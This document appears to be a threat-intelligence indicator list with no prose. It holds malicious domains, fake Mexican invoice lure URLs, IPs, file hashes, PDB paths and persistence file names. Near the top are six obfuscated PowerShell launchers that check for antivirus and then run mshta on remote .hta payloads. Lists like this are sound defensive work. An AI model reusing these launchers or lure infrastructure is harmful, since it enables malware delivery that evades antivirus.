rasaneh-iiis.org
rasaanah-iiis.org
rasaaneh-iiis.org
F:\workspace\CBG\Loader\npmLoaderDll\x64\Release\npmLoaderDll.pdb
F:\workspace\CBG\npmLoaderDll\x64\Release\npmLoaderDll.pdb
D:\workspace\CBG\Windows\Loader\npmLoaderDll\x64\Release\npmLoaderDll.pdb
F:\workspace\CBG\Loader\publicLoaderFirst\x64\Release\publicLoaderFirst.pdb
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\drvupdx86.LNK
%APPDATA%\word_update.exe
%APPDATA%\MyData\drvsysx86.exe
powershell.exe $DiXGzrR = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($fLapZtI in $DiXGzrR ){if ($fLapZtI.displayName -replace 'Windows Defender', ''){Exit}};\W*\\*2\\\\msh*e '??ht??t?p?://new-tech-savvy.com/5.h???t??a'.Replace('?','')
powershell.exe $UPaopDc = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($wgRGFMh in $UPaopDc ){if ($wgRGFMh.displayName -replace 'Windows Defender', ''){Exit}};\W*\\*2\\\\msh*e '??ht??t?p?://new-tech-savvy.com/zad.h???t??a'.Replace('?','')
powershell.exe $YMYGlxC = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($yqbdlwb in $YMYGlxC ){if ($yqbdlwb.displayName -replace 'Windows Defender', ''){Exit}};\W*\\*2\\\\msh*e '??ht??t?p?://new-tech-savvy.com/shablon.h???t??a'.Replace('?','')
powershell.exe $bIXmsjq = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($QSkPiHV in $bIXmsjq ){if ($QSkPiHV.displayName -replace 'Windows Defender', ''){Exit}};\W*\\*2\\\\msh*e '??ht??t?p?://new-tech-savvy.com/6.h???t??a'.Replace('?','')
powershell.exe $nRtKqGT = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($YjfoSFj in $nRtKqGT ){if ($YjfoSFj.displayName -replace 'Windows Defender', ''){Exit}};\W*\\*2\\\\msh*e '??ht??t?p?://new-tech-savvy.com/pered.h???t??a'.Replace('?','')
powershell.exe $soGBIxR = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($nBoAWoI in $soGBIxR ){if ($nBoAWoI.displayName -replace 'Windows Defender', ''){Exit}};\W*\\*2\\\\msh*e '??ht??t?p?://new-tech-savvy.com/algo.h???t??a'.Replace('?','')
getyourapi.site
land-nutra.b36cname.site
land<1-4>.b36cname.site	
prx<1-16>.b36cname.site	
new.xsdelx.top
bwn.objectop.xyz
sej.progmedisd.site
adin.czproftes.xyz
visa.lukzev.xyz
sun.autotrdes.top
hmz.coivalop.xyz
news.beneffit.top
goiin.baltez-offic.xyz
ultra-vest.one
kingsman-adv.org
abyss-world-asset.net
sci.pointpayment.net
makeyourpay.com
qiwi.bppsa.com
ymoney.bppsa.com
processing.betatransfer.io
crypto-payer.co
ap-gateway.mastercard.com	Legitimate domain for Mastercard used collect victim’s financial information
checkout.flutterwave.com	Legitimate domain for Flutterwave, a Nigerian payment service used to collect victim’s financial information
auproject.xyz
badanie-pl.site
blog-vcnews.site
capital-inwest.site
dasms.xyz
duums.xyz
esbopehan.xyz
futtes.site
gernik.site
groovetonprogramz.xyz
lintant.top
mipinves.site
mixx-today.site
newprogrms.xyz
oksitepl.site
onlinedietslimm.xyz
prostprogr.xyz
rslimess.xyz
satin1.xyz
sunproflts.site
https://blockchain-newtech.com/download/download.asp
https://fasttet.com/user/agency.asp
https://chaingrown.com/manage/manage.asp
http://91.206.178.125/upload/upload.asp
b4a04b450bb7cae5ea578e79ae9d0f203711c18c3f3a6de9900d2bdfaa4e7f67
c56c94e21913b2df4be293001da84c3bb20badf823ccf5b6a396f5f49df5efff
956d2ed558e3c6e447e3d4424d6b14e81f74b63762238e84069f9a7610aa2531
6bba8f488c23a0e0f753ac21cd83ddeac5c4d14b70d4426d7cdeebdf813a1094
173e6bc33efc7a03da06bf5f8686a89bbed54b6fc8a4263035b7950ed3886179
3ab6e6fc888e4df602eff1c5bc24f3e976215d1e4a58f963834e5b225a3821f5
60c080a29f58cf861f5e7c7fc5e5bddc7e63dd1db0badc06729d91f65957e9ce
26437bc68133c2ca09bb56bc011dd1b713f8ee40a2acc2488b102dd037641c6e
63fb47c3b4693409ebadf8a5179141af5cf45a46d1e98e5f763ca0d7d64fb17c
e05142f8375070d1ea25ed3a31404ca37b4e1ac88c26832682d8d2f9f4f6d0ae
01c5836655c6a4212676c78ec96c0ac6b778a411e61a2da1f545eba8f784e980
aec915753612bb003330ce7ffc67cfa9d7e3c12310f0ecfd0b7e50abf427989a
85c3a2b185f882abd2cc40df5a1a341962bc4616bc78a344768e4de1d5236ab7
a4e4618b358c92e04fe6b7f94a114870c941be5e323735a2e5cd195138327f8f
a8a5411f3696b276aee37eee0d9bed99774910a74342bbd638578a315b65e6a6
8fb6d8a5013bd3a36c605031e86fd1f6bb7c3fdba722e58ee2f4769a820b86b0
523613a7b9dfa398cbd5ebd2dd0f4f38
2a0d26b8b02bb2d17994d2a9a38d61db
4cd78b6cc1e3d3dde3e47852056f78ad
085c68576c60ca0361b9778268b0b3b9
b6aaced82b7c663a5922ce298831885a
7b2793902d106ba11d3369dff5799aa5
ad33f965d406c8f328bd71aff654ec4c
7e5cc9d086c93fa1af1d3453b3c6946e
e60d8a3f2190d78e94c7b952b72916ac
8434de0c058abb27c928a10b3ab79ff8
90b74cdc4b7763c6b25fdcd27f26377f
83e163afd5993320882452453c214932
a0766ad196626f28919c904d2ced6c85
903fce58cb4bfc39786c77fe0b5d9486
c2fb307aee872df475a7345d641d72da
88d49dad824344b8d6103c96b4f81d19
efc2a705c858ed08a76d20a8f5a11b1b
575575f5b6f9c4f7149ed6d86fb16c0f
547c02a9b01194a0fcbfef79aaa52e38
fd0fe2a3d154c412be6932e75a9a5ca1
https://hamster69.senac2021.org/~armadillo492370/
https://snapdragon50.crimsondragonemperor.com/~aster963249/
https://69.64.35.1/~route649289/
24.199.98.128
159.89.50.225
104.131.169.252
104.131.67.109
137.184.108.25
137.184.115.230
138.197.34.162
142.93.50.216
143.244.144.166 
143.244.160.115
146.190.208.30
157.230.238.116
157.245.8.79
159.223.96.160
159.89.226.127
159.89.90.109
162.243.171.207
167.71.24.13
167.71.245.175
167.71.246.120
192.241.141.137
24.144.96.15
45.55.65.159
64.225.29.249
http://folio24.spacefordailyrituals.com/facdigital/55ae12184283dc
http://folio47.marcialledo.com/seg_factura/e6bab6d032e282
http://pdf43.marcialledo.com/factura/50e1e86db86ff2
http://suscripcion95.servicioslomex.online/cfdi/0faa4a21fff2bb
https://0.solucionegos.top/timbreDigital/e99522f778ea6a
https://auditoria38.meinastrohoroskop.com/factura/b5b0c16b999573
https://auditoria42.altavista100.com/factura/b20569ae393e7e
https://auditoria67.mariageorgina.com/cfdi/bb743b25f5c526
https://auditoria7.miramantolama.com/factura/d84d576baf1513
https://auditoria82.taoshome4sale.com/seg_factura/efebfc104991d4
https://auditoria84.meinastrohoroskop.com/timbreDigital/8f7b2f8304d08e
https://auditoria88.mariageorgina.com/factura/3db4832ada4f80
https://auditoria89.venagard.com/timbreDigital/f6a5f34123d980
https://auditoria92.venagard.com/factura/2c6652a143f815
https://auditoria93.serragrandreunion.com/timbreDigital/a2e79b61ac4635
https://comprobante14.miramantolama.com/seg_factura/fb0b02b2d41b12
https://comprobante2.marcialledo.com/factura/3ce069ac2b865e
https://comprobante27.mariageorgina.com/timbreDigital/eada68119275aa
https://comprobante27.serragrandreunion.com/facdigital/bca7513c9e00b9
https://comprobante27.servicioslocomer.online/factura/2003b3fe7ae6f4
https://comprobante45.altavista100.com/cfdi/d13011c95ba2b0
https://comprobante51.meinastrohoroskop.com/facdigital/121c0388193ba5
https://comprobante63.serragrandreunion.com/facdigital/3c45bca741d4f6
https://comprobante68.portafoliocfdi.com/seg_factura/58c0146a753186
https://comprobante70.miramantolama.com/timbreDigital/18665ae0a7b9e1
https://comprobante75.meinastrohoroskop.com/timbreDigital/bfa30824f1120b
https://comprobante80.serragrandreunion.com/timbreDigital/bf4a8735ed3953
https://comprobante91.servicioslocomer.online/timbreDigital/adb6403b186182
https://comprobante93.venagard.com/cfdi/57880f98ef2b70
https://cumplimiento19.altavista100.com/timbreDigital/dd141e683a3056
https://cumplimiento35.solucionegos.top/factura/bde64155cabbe5
https://cumplimiento39.meinastrohoroskop.com/seg_factura/d4e9d7823adff2
https://cumplimiento43.commerxion.buzz/facdigital/1ac5acb1a5525b
https://cumplimiento47.solucionegos.top/seg_factura/7fa6018dc9b68f
https://cumplimiento48.callarlene.net/seg_factura/c19a0dd4addc3e
https://cumplimiento56.timbradoelectronico.com/facdigital/dd37434dcde7ad
https://cumplimiento72.serragrandreunion.com/seg_factura/92cd2425a6c150
https://cumplimiento81.paulfenelon.com/cfdi/20149ee8e1d3b2
https://cumplimiento91.miramantolama.com/seg_factura/e907d32bf0d056
https://cumplimiento94.meinastrohoroskop.com/cfdi/bd56529f9d1411
https://cumplimiento98.serragrandreunion.com/factura/3f209bc16cbb9a
https://factura10.miramantolama.com/factura/039d9cbaeec9b5
https://factura20.facturascorporativas.com/seg_factura/9622cf8c695873
https://factura20.solunline.top/cfdi/6401eac16211b2
https://factura34.changjiangys.net/facdigital/52490c838bd94f
https://factura4.servicioslocomer.online/cfdi/f2369d09a54ad9
https://factura40.miramantolama.com/cfdi/9318466130e6af
https://factura44.servicioslocales.online/cfdi/25e8a6f5393e1f
https://factura46.facturasfiel.com/factura/021bd5fa122bb2
https://factura49.marcialledo.com/factura/fc2cc5bf671dd0
https://factura50.callarlene.net/cfdi/867d138f26fb23
https://factura59.altavista100.com/seg_factura/0179ae05a51830
https://factura7.taoshome4sale.com/factura/eebf49f810a0a6
https://factura71.servicioslomex.online/timbreDigital/5de7db415c7e8e
https://factura72.serragrandreunion.com/seg_factura/728423dceff50c
https://factura73.mariageorgina.com/cfdi/71deea8cdbcb10
https://factura81.altavista100.com/factura/8421cd5cb1c8e4
https://factura90.changjiangys.net/timbreDigital/029a6531330379
https://factura91.servicioslocomer.online/timbreDigital/2952b54a9542f1
https://folio24.serragrandreunion.com/seg_factura/548b685f48dd30
https://folio24.spacefordailyrituals.com/facdigital/55ae12184283dc
https://folio47.marcialledo.com/seg_factura/e6bab6d032e282
https://folio53.mariageorgina.com/seg_factura/ca2fd939c046fa
https://folio60.callarlene.net/seg_factura/367b377baf47e5
https://folio75.taoshome4sale.com/cfdi/7482bf3f2690af
https://folio75.venagard.com/cfdi/7718efe0fd3952
https://folio76.miramantolama.com/cfdi/a74b25b75c7182
https://folio83.altavista100.com/factura/20f00b7d569c85
https://folio89.changjiangys.net/factura/b645784e80f71a
https://folio90.servicioslocomer.online/facdigital/d1950dc8f24757
https://folio99.solunline.top/facdigital/b7928d4e0eade5
https://pdf21.changjiangys.net/cfdi/2f99e7adf61c47
https://pdf33.venagard.com/timbreDigital/91849e7d9fe4ad
https://pdf34.solucionpiens.top/seg_factura/2dfed5bc7fcbf6
https://pdf39.facturasonlinemx.com/seg_factura/66971f3669145a
https://pdf49.marcialledo.com/factura/729c18972d690c
https://pdf50.changjiangys.net/factura/cdb5ed3876c4bf
https://pdf57.visual8298.top/factura/5239e15a8324ab
https://pdf59.venagard.com/cfdi/5791bf23c6929e
https://pdf63.paulfenelon.com/timbreDigital/3ae250718da0ca
https://pdf65.verificatutramite.com/facdigital/e1ec8098e50a0b
https://pdf70.mariageorgina.com/cfdi/fab1264f158f44
https://pdf81.photographyride.com/seg_factura/4eb3832fe6d1bd
https://pdf85.miramantolama.com/factura/74f871b7ca1977
https://pdf93.venagard.com/factura/f24a53f8932b3f
https://pdf98.solunline.top/timbreDigital/f57e558c31a86e
https://portal27.marcialledo.com/timbreDigital/f8a5f05b3c1651
https://portal34.solunline.top/cfdi/a068bb0da7eea1
https://portal48.solucionpiens.top/timbreDigital/15ec5fc2aaf26a
https://portal50.solucionegos.top/factura/8d4c6f7e2a4c7f
https://portal55.solucionegos.top/seg_factura/f5f59070b20629
https://portal63.paulfenelon.com/seg_factura/77907fa76c7c59
https://portal70.solunline.top/timbreDigital/92b380d91a67a0
https://portal80.changjiangys.net/cfdi/2224782a3b7f1d
https://portal86.serragrandreunion.com/facdigital/68da4282591283
https://portal90.meinastrohoroskop.com/factura/64f247c6238c38
https://portal92.solucionpiens.top/timbreDigital/34893de446d532
https://suscripcion0.venagard.com/timbreDigital/5c86c63ca1ffda
https://suscripcion10.solunline.xyz/facdigital/ebe0cb51090e51
https://suscripcion24.facturasonlinemx.com/factura/d6a6f8208ed508
https://suscripcion24.venagard.com/timbreDigital/50c6f1fad17f5e
https://suscripcion32.servicioslocomer.online/facdigital/22ccd8880c217e
https://suscripcion38.eagleservice.buzz/cfdi/6dadfe1a18cffc
https://suscripcion38.mariageorgina.com/factura/9c787623800b5e
https://suscripcion57.changjiangys.net/factura/22ad73593f724a
https://suscripcion65.g1ooseradas.buzz/factura/9f03d9ef3d73b5
https://suscripcion84.taoshome4sale.com/cfdi/e4af3e6e22a8a6
https://suscripcion95.servicioslomex.online/cfdi/0faa4a21fff2bb
https://timbrado0.meinastrohoroskop.com/cfdi/515c9b9087c737
https://timbrado11.verificatutramite.com/facdigital/f7640878ebc0f9
https://timbrado16.taoshome4sale.com/timbreDigital/259029c9d7f330
https://timbrado17.marcialledo.com/factura/2ea580ee99d5f1
https://timbrado17.mariageorgina.com/seg_factura/95a6c2c0e004d8
https://timbrado2.serviciosna.top/facdigital/c5cb33d68be323
https://timbrado2.solucionegos.top/seg_factura/7c867709e85c67
https://timbrado33.meinastrohoroskop.com/timbreDigital/aaf2cc575db42c
https://timbrado42.mariageorgina.com/facdigital/f0f82ab0c87b32
https://timbrado54.changjiangys.net/cfdi/04e4e38338d82a
https://timbrado6.meinastrohoroskop.com/cfdi/5290b37e80850a
https://timbrado73.mariageorgina.com/timbreDigital/ff862f9245e8b6
https://timbrado74.callarlene.net/timbreDigital/eb52e334a2c0b3
https://timbrado74.mexicofacturacion.com/factura/14fcb6e3eaf351
https://timbrado80.paulfenelon.com/timbreDigital/684bc3f7d7e7f9
https://timbrado84.miramantolama.com/cfdi/18864dcecc9e9c
https://timbrado90.porcesososo.online/factura/cde31eb6fcac1d
https://timbrado96.paulfenelon.com/facdigital/ef18828525a8fb
https://validacion22.hb56.cc/seg_factura/8f845f6ba70820
https://trilivok.com/2ysz0gghg/cbt0mer/it.php?f=2&w=Windows%2010 
https://trilivok.com/3s9p2w9yy/bvhcc5x/it.php?f=9&w=Windows%2010
https://chidoriland.com/1r49ucc73/hs4q07q/it.php?f=2&w=Windows%2010
https://manderlyx.com/cruto/it.php?f=2&w=Windows%2010
https://bailandolambada.com/5iplivg7q/gn4md5c/it.php?f=2&w=Windows%2010
trilivok.com
chidoriland.com
manderlyx.com
bailandolambada.com
0.solucionegos.top
auditoria38.meinastrohoroskop.com
auditoria42.altavista100.com
auditoria67.mariageorgina.com
auditoria7.miramantolama.com
auditoria82.taoshome4sale.com
auditoria84.meinastrohoroskop.com
auditoria88.mariageorgina.com
auditoria89.venagard.com
auditoria92.venagard.com
auditoria93.serragrandreunion.com
comprobante14.miramantolama.com
comprobante2.marcialledo.com
comprobante27.mariageorgina.com
comprobante27.serragrandreunion.com
comprobante27.servicioslocomer.online
comprobante45.altavista100.com
comprobante51.meinastrohoroskop.com
comprobante63.serragrandreunion.com
comprobante68.portafoliocfdi.com
comprobante70.miramantolama.com
comprobante75.meinastrohoroskop.com
comprobante80.serragrandreunion.com
comprobante91.servicioslocomer.online
comprobante93.venagard.com
cumplimiento19.altavista100.com
cumplimiento35.solucionegos.top
cumplimiento39.meinastrohoroskop.com
cumplimiento43.commerxion.buzz
cumplimiento47.solucionegos.top
cumplimiento48.callarlene.net
cumplimiento56.timbradoelectronico.com
cumplimiento72.serragrandreunion.com
cumplimiento81.paulfenelon.com
cumplimiento91.miramantolama.com
cumplimiento94.meinastrohoroskop.com
cumplimiento98.serragrandreunion.com
factura10.miramantolama.com
factura20.facturascorporativas.com
factura20.solunline.top
factura34.changjiangys.net
factura4.servicioslocomer.online
factura40.miramantolama.com
factura44.servicioslocales.online
factura46.facturasfiel.com
factura49.marcialledo.com
factura50.callarlene.net
factura59.altavista100.com
factura7.taoshome4sale.com
factura71.servicioslomex.online
factura72.serragrandreunion.com
factura73.mariageorgina.com
factura81.altavista100.com
factura90.changjiangys.net
factura91.servicioslocomer.online
folio24.serragrandreunion.com
folio24.spacefordailyrituals.com
folio47.marcialledo.com
folio53.mariageorgina.com
folio60.callarlene.net
folio75.taoshome4sale.com
folio75.venagard.com
folio76.miramantolama.com
folio83.altavista100.com
folio89.changjiangys.net
folio90.servicioslocomer.online
folio99.solunline.top
pdf21.changjiangys.net
pdf33.venagard.com
pdf34.solucionpiens.top
pdf39.facturasonlinemx.com
pdf43.marcialledo.com
pdf49.marcialledo.com
pdf50.changjiangys.net
pdf57.visual8298.top
pdf59.venagard.com
pdf63.paulfenelon.com
pdf65.verificatutramite.com
pdf70.mariageorgina.com
pdf81.photographyride.com
pdf85.miramantolama.com
pdf93.venagard.com
pdf98.solunline.top
portal27.marcialledo.com
portal34.solunline.top
portal48.solucionpiens.top
portal50.solucionegos.top
portal55.solucionegos.top
portal63.paulfenelon.com
portal70.solunline.top
portal80.changjiangys.net
portal86.serragrandreunion.com
portal90.meinastrohoroskop.com
portal92.solucionpiens.top
suscripcion0.venagard.com
suscripcion10.solunline.xyz
suscripcion24.facturasonlinemx.com
suscripcion24.venagard.com
suscripcion32.servicioslocomer.online
suscripcion38.eagleservice.buzz
suscripcion38.mariageorgina.com
suscripcion57.changjiangys.net
suscripcion65.g1ooseradas.buzz
suscripcion84.taoshome4sale.com
suscripcion95.servicioslomex.online
timbrado0.meinastrohoroskop.com
timbrado11.verificatutramite.com
timbrado16.taoshome4sale.com
timbrado17.marcialledo.com
timbrado17.mariageorgina.com
timbrado2.serviciosna.top
timbrado2.solucionegos.top
timbrado33.meinastrohoroskop.com
timbrado42.mariageorgina.com
timbrado54.changjiangys.net
timbrado6.meinastrohoroskop.com
timbrado73.mariageorgina.com
timbrado74.callarlene.net
timbrado74.mexicofacturacion.com
timbrado80.paulfenelon.com
timbrado84.miramantolama.com
timbrado90.porcesososo.online
timbrado96.paulfenelon.com
validacion22.hb56.cc
600d085638335542de1c06a012ec9d4c56ffe0373a5f61667158fc63894dde9f
883674fa4c562f04685a2b733747e4070fe927e1db1443f9073f31dd0cb5e215
b1b85c821a7f3b5753becbbfa19d2e80e7dcbd5290d6d831fb07e91a21bdeaa7
e04cee863791c26a275e0c06620ea7403c736f8cafbdda3417f854ae5d81a49f
aa187a53e55396238e97638032424d68ba2402259f2b308c9911777712b526af
66af21ef63234c092441ec33351df0f829f08a2f48151557eb7a084c6275b791
b3f4b207ee83b748f3ae83b90d1536f9c5321a84d9064dc9745683a93e5ec405
e87325f4347f66b21b19cfb21c51fbf99ead6b63e1796fcb57cd2260bd720929
103d3e03ce4295737ef9b2b9dfef425d93238a09b1eb738ac0e05da0c6c50028
a579bd30e9ee7984489af95cffb2e8e6877873fd881aa18d7f5a2177d76f7bf2
b01e917dd14c780cb52cafcd14e4dd499c33822c7776d084d29cf5e0bb0bddb6
795c0b82b37d339ea27014d73ad8f2d28c5066a7ceb6a2aa0d74188df9c311c9
07521bd6acf725b8a33d1d91fd0cc7830d2cff66abdb24616c2076b63d3f36a8
71ce48c89b22e99356c464c1541e2d7b9419a2c8fe8f6058914fc58703ba244f
ba7bc4cff098f49d39e16c224e001bd40a5d08048aeec531f771a54ee4a5ecef
010b48762a033f91b32e315ebcefb8423d2b20019516fa8f2f3d54d57d221bdb
024f3c591d44499afb8f477865c557fc15164ab0f35594e0cfdfa76245459762
03cd17df83a7bdf459f16677560e69143d1788ce1fc7927200a09f82859d90ea
075910c802f755d3178a8f1f14ee4cd7924fd4463c7491277bdf2681b16e593c
12bff33da7d9807252bb461d65828154b9b5b1dca505e8173893e3d410d40dd0
1aaa4fb29a88c83495de80893cd2476484af561bb29e8cdfc73ce38f6cd61a84
23b9e4103141d6a898773b1342269334e569bcf576cdcb4a905f24e26320cdab
27c1e41fde9bc0d5027a48ccada1af8c9c8f59937bf5f77edd21e49bd28f29a2
2a225784289f31adbaa8be0b8770495fa8950fce2b7352a0c7a566fc79067547
2a38b75e88f91f9cd28ef478e82c3b44f50e57cb958ba63e58f134d8bd368812
2a3f869e9e78b4d7945a60ceec27586c07bc8b0770be64463358fffe3b6b7395
2e04c36b7ddd6939b7bef258bfeba6f91a5c37a43389dd6d9a88eff5863df5ed
43e99539e4b966dde2f9de8dc1ffb4a22bc560e54c01de9aef6b15fac1412714
46226d4fb7ffe15ba8167e3724f991c543731672e19ef40bb43fddc6df648d0a
46cc07a9287da26e238a74734d87e0aae984f4648a80a26547afa0de8c850afb
51be3a3b4ebd15c305c0f9b57388c449f88f0d6d2d46a0a838f046f0fd21b78f
55b0247b9b574978a4c9abd19c3bcc04ea78598398b9f8aeb35bd51cbd877576
56612bb0ab00cbb7af24326b027a55ff25852ddab1f1c8e24471b7ce97003505
5831f4f8ce715d4a021284e68af1b6d8040a2543484ac84b326eea20c543552e
58562e49c1612f08e56e7d7b3ca6cd78285948018b2998e45bd425b4c79ce1f4
62495620b0d65d94bc3d68dec00ffbe607eacd20ab43dc4471170aa292cc9b1a
682546addb38a938982f0f715b27b4ba5cda4621e63f872f19110d174851c4e9
69019b7b64deb5cc91a58b6a3c5e6b1b6d6665bd40be1381a70690ba2b305790
6bf082f001f914824a6b33f9bdd56d562c081097692221fb887035e80926d583
7923d409959acffab49dda63c7c9c15e1bdd2b5c16f7fcfe8ef3e3108e08df87
7ac22989021082b9a377dcc582812693ce0733e973686b607e8fc2b52dcf181d
8420d77ba61925b03a1ad6c900a528ecacbb2c816b3e6bc62def40fc14e03b78
850dd47a0fb5e8b2b4358bf3aa1abd7ebaae577b6fc4b6b4e3d7533313c845b8
96363b2b9e4ed8044cb90b6619842ba8897b4392f9025cbfdccfda1ea7a14a58
97157c8bbeb8769770c4cb2201638d9ad0103ba2fdfed9bdbd03c53bd7a5fcb9
a103b0c604ef32e7aabb16c2a7917fd123c41486d8e0a4f43dcf6c48d76de425
a82fb82f3aa2f6123d2c0fb954ae558ac6e8862ef756b12136fbe8d533b30573
a92934c014a7859bd122717f4c87f6bd31896cb87d28c9fac1a6af57ff8110f6
ab2a2465fccd7294580c11492c29a943c54415e0c606f41e08ce86d69e254ee4
ababe815e11b762089180e5fb0b1eaffa6a035d630d7aaf1d8060bd5d9a87ea5
b04a0a4a1520c905007a5d370ed2b6c7cb42253f4722cc55a9e475ae9ece1de7
c29b9f79b0a34948bde1dfca3acecca6965795917c7d3444fcacba12f583fb98
c99237a5777a2e8fa7da33460a5b477d155cc26bc2e297a8563516a708323ead
ca652fc3a664a772dbf615abfe5df99d9c35f6a869043cf75736e6492fbd4bea
b5a272acd842154b2069b60aab52568bbfde60e59717190c71e787e336598912
5efa99b3cb17bec76fec2724bcfcc6423d0231bba9cf9c1aed63005e4c3c2875
ce135a7e0410314126cacb2a2dba3d6d4c17d6ee672c57c097816d64eb427735
d3ff98b196717e66213ccf009cbeed32250da0e2c2748d44f4ee8fb4f704407c
35b7dd775db142699228d3e64ee8e9a02c6d91bb49f7c2faf367df8ba2186fd6
e65e25aee5947747f471407a6cce9137695e4fee820f990883b117726195988c
e8ed09b016ea62058404c482edf988f14a87c790d5c9bd3d2e03885b818ef822
febf9c5ede3964fdb3b53307a3d5ef7b0e222705a3bb39bef58e28aaba5eed28
ff3769c95b8a5cdcba750fda5bbbb92ef79177e3de6dc1143186e893e68d45a4
72310e31280b7e90ebc9a32cb33674060a3587663c0334daef76c2ae2cc2a462
3fd080ef4cc5fbf8bf0e8736af00af973d5e41c105b4cd69522a0a3c34c96b6d
9243bdcbe30fbd430a841a623e9e1bcc894e4fdc136d46e702a94dad4b10dfdc
0763e887924f6c7afad58e7675ecfe34ab615f4bd8f569759b1c33f0b6d08c64
dee2af08e1f5bb89e7bad79fae5c39c71ff089083d65da1c03c7a4c051fabae0
e6537d30d66727c5a306dc291f02ceb9d2b48bffe89dd5eff7aa2d22e28b6d7c
1d04d9a8eeed0e1371afed06dcc7300c7b8ca341fe2d4d777191a26dabac3596
1a31b8e23ccc7933c442d88523210c89cebd2c199d9ebb88b3d16eacbefe4120
25ce2fec4cd164a93dee5d00ab547ebe47a4b713cced567ab9aca4a7080afcb7
b524773160f3cb3bfb96e7704ef31a986a179395d40a578edce8257862cafe5f
362a16c5e86f13700bdf2d58f6c0ab26e289b6a5c10ad2769f3412ec0b2da711
e5417c7a24aa6f952170e9dfcfdf044c2a7259a03a7683c3ddb72512ad0cd5c7
056220ff4204783d8cc8e596b3fc463a2e6b130db08ec923f17c9a78aa2032da
877c8a1c391e21727b2cdb2f87c7b0b37fb7be1d8dd2d941f5c20b30eb65ee97
2e42b9ded573e97c095e45dad0bdd2a2d6a0a99e4f7242695054217e2bba6829
72b92683052e0c813890caf7b4f8bfd331a8b2afc324dd545d46138f677178c4
ad43bbb21e2524a71bad5312a7b74af223090a8375f586d65ff239410bbd81a7 
3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9 
1c7593078f69f642b3442dc558cddff4347334ed7c96cd096367afd08dca67bc 
e477f52a5f67830d81cf417434991fe088bfec21984514a5ee22c1bcffe1f2bc
f61cee951b7024fca048175ca0606bfd550437f5ba2824c50d10bef8fb54ca45
c1223aa67a72e6c4a9a61bf3733b68bfbe08add41b73ad133a7c640ba265a19e
b014cdff3ac877bdd329ca0c02bdd604817e7af36ad82f912132c50355af0920
7600d4bb4e159b38408cb4f3a4fa19a5526eec0051c8c508ef1045f75b0f6083
https://castechtools.com/api.php
https://seeceafcleaners.co.uk/cert.php
https://seeceafcleaners.co.uk/wine.php
https://passatempobasico.com.br/wine.php
944153fb9692634d6c70899b83676575
efc80697aa58ab03a10d02a8b00ee740
c90abb4bbbfe7289de6ab1f374d0bcbe
341d43d4d5c2e526cadd88ae8da70c1c
34aac5719824e5f13b80d6fe23cbfa07
eea9ab1f36394769d65909f6ae81834b
379bf8c60b091974f856f08475a03b04
ebca4398e949286cb7f7f6c68c28e838
c04c386b945ccc04627d1a885b500edf
824d0e31fd08220a25c06baee1044818
c64300cf8bacc4e42e74715edf3f8c3287a780c9c0a38b0d9675d01e7e231f16
1f5e4e2c78451623cfbf32cf517a92253b7abfe0243297c5ddf7dd1448e460d5
3670dd4663adca40f168f3450fa9e7e84bc1a612d78830004020b73bd40fcd71
af28b78c64a9effe3de0e5ccc778527428953837948d913d64dbd0fa45942021
bbfe7289de6ab1f374d0bcbeecf31cad2333b0928ea883ca13b9e733b58e27b1
5d1df950b238825a36fa6204d1a2935a5fbcfe2a5991a7fc69c74f476df67905
bd9edc3bf3d45e3cdf5236e8f8cd57a95ca3b41f61e4cd5c6c0404a83519058e
732e24cb5d7ab558effc6dc88854f756016352c923ff5155dcb2eece35c19bc0
3dd0f674526f30729bced4271e6b7eb0bb890c52
d6d442e8b3b0aef856ac86391e4a57bcb93c19ad
6b52543e4097f7c39cc913d55c0044fcf673f6fc
004ba0454feb2c4033ff0bdb2ff67388af0c41b6
430bd437162d4c60227288fa6a82cde8a5f87100
1376ac8b5a126bb163423948bd1c7f861b4bfe32
380f941f8047904607210add4c6da2da8f8cd398
resources.docusong.com
Fisa99.screenconnect.com
5.199.168.24
91.92.254.193
https://rollecoin.online/download.html
https://cloudmine.online/CloudMine/CloudMine1_5.exe?e=Access&y=Guest
https://sgacor.kenparkmdpllc.com/
https://minerclouds.xyz/ 
Claimbloacks.xyz 
Addonswallet.lat 
03b9ee39f5316efe71b0c915374da7d3d4b393ed402d4fe6b57cbc38ac60783b
e594dc53d2bf4518632e9ca4308a11a0b10409f035554255bbdc7e3f577fe585
afd0c82318a32f3a82bbc8320e03e33ee84e3fb3c8a64b3fe06a48fc37682dae
instance-anbr85-relay.screenconnect.com
instance-b5lwpw-relay.screenconnect.com
instance-oisw57-relay.screenconnect.com 
13b1d354ac2649b309b0d9229def8091
6f9e84087cabbb9aaa7d8aba43a84dcf
848020d2e8bacd35c71b78e1a81c669c9dc63c78dd3db5a97200fc87aeb44c3c
96b091ce5d06afd11ee5ad911566645dbe32bfe1da2269a3d3ef8d3fa0014689
4d0d8c2696588ff74fe7d9f8c2097fddd665308fccf16ffea23b9741a261b1c0
7704241dd8770b11b50b1448647197a5
1762536a663879d5fb8a94c1d145331e1d001fb27f787d79691f9f8208fc68f2
0aa5930aa736636fd95907328d47ea45
45.61 .139.51
internal-liveapps.online
Screenshot_2024-01-30_w-69-06-18264122612_DCIM.png.lnk
Screenshot_2024-01-30_w-69-06-18264122612_DCIM.png.lnk
https://a1revenue.co.uk/SQ.php?TSI=5
https://gpshelpline.com/EAUD.php?NSII=10
https://limpiotucompu.com/OSIQ.php?ELIEAOSMT=1
https://smartvizx.com/UE.php?AISESCTISEBTUN=4
https://babarbrotherscargo.com/RO.php?NI=1
https://rjll.org.pk/TUEI.php?CUM=3
https://isoatte.com/LOTV.php?NTUEDRSE=8
myvigyan.com/m1YPt/300123.gif
77.75.230.128/47820.dat
86.194.156.14:2222
91.234.254.213/55788.dat
31c48ac6cfaeea3d2748d6fa6bbe6cd33c3fbb250fb36eb56add7615296ab3ab
63ea310921ebc1c56aad91c2e2616552d865458353687ea3da7652856d249892
3454d51502b337287a41b8aa2f23dae9e8f4172c1abec96612e07595d68d5f80
